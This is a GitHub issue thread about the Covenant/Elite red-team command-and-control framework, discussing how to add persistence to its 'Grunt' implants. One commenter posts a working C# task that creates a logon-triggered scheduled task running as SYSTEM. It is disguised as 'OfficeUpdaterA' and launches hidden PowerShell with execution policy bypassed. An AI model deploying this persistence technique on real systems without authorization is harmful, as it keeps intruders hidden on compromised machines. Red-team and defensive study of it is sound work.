search

cobbr / Elite

Elite is the client-side component of the Covenant project. Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
https://cobbr.io/Covenant.html
GNU General Public License v3.0
117 stars 18 forks source link

grunt persistence #12

Open robomotic opened 5 years ago

robomotic commented 5 years ago

Hello, do we have plan to integrate persistence when building the launcher?

Would love to see a basic diagram about the life cycle of a Grunt, currently is based on an encrypted RC4 over https connection right?

Persistence should be an option when building the first implant to make sure we get a connection back after reboots or if something goes wrong.

Let me know your thoughts. :-)

cobbr commented 5 years ago

Hey @robomotic, I definitely would like to add some more persistence options in the near future. I don't envision embedding persistence directly into the implant itself, but likely as post-exploitation Tasks. But if you come up with some a good roadmap for what it might look like in the implant itself, I am open to suggestions.

A life-cycle of a Grunt diagram would be a great idea, I'll add that to the to-do list.

RC4 is not used for encryption. Covenant utilizes an EKE (Encrypted Key Exchange) to negotiate an AES key that is used for encryption. Optionally, ssl can additionally be used if you are communicating over HTTPS.

robomotic commented 5 years ago

Thanks for the clarification, so for the persistence I was thinking something along those lines. Under the Covenant/Data/Tasks we could create one for each type. For example a persistence Taks based on win32 logon could be implemented like this:

using System;
using SharpSploit.Execution;
public static class Task
{
    public static string Execute(string ps_command)
    {
        try
        {
            string ps_path = "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe";
            string ps_flags = "-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c";
            string ps_one_liner = String.Format("{0} {1} {2}",ps_path,ps_flags,ps_command);
            string ShellCommand = String.Format("schtasks /create /tn OfficeUpdaterA /tr \"{0}\" /sc onlogon /ru System",ps_one_liner);
            return Shell.ShellCmdExecute(ShellCommand);
        }
        catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
    }
}

Now the ps_command should include the actual one liner of the Grunt implant. Is there a way to inherit that from the Grunt executing the Task otherwise you will have to pass that in the method which is not elegant. Important to remember that this kind of approach is limited by the max chars in the commandline.

If this is possible I can easily port the following methods as https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1.

Cheers.

cobbr commented 5 years ago

Hey @robomotic , I'd recommend heading over to the Covenant github page at https://github.com/cobbr/Covenant

There are a few persistence Tasks built-in now. But feel free to add new ones!

robomotic commented 5 years ago

Wow you have been busy!